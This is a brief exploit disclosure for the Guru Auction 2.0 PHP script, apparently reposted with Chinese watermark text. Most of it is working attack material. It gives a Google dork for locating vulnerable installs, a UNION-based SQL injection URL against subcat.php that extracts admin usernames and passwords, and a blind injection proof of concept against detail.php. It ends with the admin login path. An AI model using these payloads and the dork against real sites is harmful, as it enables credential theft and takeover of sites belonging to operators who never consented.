Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
作者 : v3n0m涛涛电脑知识网
应用 : Guru Auction 2.0涛涛电脑知识网
Price : $49
Vendor :
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
盲注 p0c:
~~~~~~~~~~
/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
管理登录入口:
~~~~~~~~~~
[path]/admin/